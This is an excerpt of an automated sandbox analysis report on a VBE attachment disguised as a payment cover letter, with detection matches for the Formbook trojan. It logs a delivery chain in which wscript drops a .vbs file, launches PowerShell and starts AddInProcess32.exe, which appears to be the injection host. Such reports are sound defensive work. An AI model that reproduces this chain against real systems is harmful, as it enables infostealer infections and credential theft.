          Source: 5.2.AddInProcess32.exe.db0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 5.2.AddInProcess32.exe.db0000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.2428546911.0000000000DB0000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: 00000005.00000002.2428974827.0000000001710000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
          Source: classification engineClassification label: mal100.troj.expl.evad.winVBE@72/83@0/1
          Source: C:\Windows\System32\wscript.exeFile created: C:\Users\user\AppData\Roaming\mBUojysElnsNYdM.vbsJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
          Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6292:120:WilError_03
          Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4900:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1224:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6812:120:WilError_03
          Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6048:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5696:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5280:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5124:120:WilError_03
          Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1280:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4864:120:WilError_03
          Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1576:120:WilError_03
          Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3564:120:WilError_03
          Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2016:120:WilError_03
          Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5932:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4880:120:WilError_03
          Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3320:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4176:120:WilError_03
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4600:120:WilError_03
          Source: C:\Windows\System32\wermgr.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7060:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\PSReadLineHistoryFile_2116847995
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5864:120:WilError_03
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_2hn0xigp.k0l.ps1Jump to behavior
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\mBUojysElnsNYdM.vbs"
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Process WHERE Name='AddInProcess32.exe'
          Source: C:\Windows\System32\wscript.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Process
          Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
          Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
          Source: 01_COVER_LETTER_-_FOR_E_PAYMENT.vbeReversingLabs: Detection: 13%
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\01_COVER_LETTER_-_FOR_E_PAYMENT.vbe"
          Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\AppData\Roaming\mBUojysElnsNYdM.vbs"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5960" "2556" "2808" "2640" "0" "0" "2560" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5264" "2560" "2180" "2464" "0" "0" "2640" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2056" "2800" "2732" "2804" "0" "0" "2808" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3780" "2612" "2844" "2596" "0" "0" "2508" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5256" "2508" "2512" "2556" "0" "0" "2560" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5368" "2468" "2228" "2508" "0" "0" "2496" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6068" "2816" "2752" "2820" "0" "0" "2824" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1596" "2640" "2808" "2340" "0" "0" "2572" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4392" "2800" "2312" "2804" "0" "0" "2808" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6780" "2824" "2552" "2828" "0" "0" "2832" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe" Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5960" "2556" "2808" "2640" "0" "0" "2560" "0" "0" "0" "0" "0" Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5264" "2560" "2180" "2464" "0" "0" "2640" "0" "0" "0" "0" "0" Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "2056" "2800" "2732" "2804" "0" "0" "2808" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "3780" "2612" "2844" "2596" "0" "0" "2508" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5256" "2508" "2512" "2556" "0" "0" "2560" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "5368" "2468" "2228" "2508" "0" "0" "2496" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6068" "2816" "2752" "2820" "0" "0" "2824" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "1596" "2640" "2808" "2340" "0" "0" "2572" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "4392" "2800" "2312" "2804" "0" "0" "2808" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wermgr.exe "C:\Windows\system32\wermgr.exe" "-outproc" "0" "6780" "2824" "2552" "2828" "0" "0" "2832" "0" "0" "0" "0" "0"
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msxml6.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttpcom.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: webio.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: winnsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: taskschd.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: xmllite.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
          Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
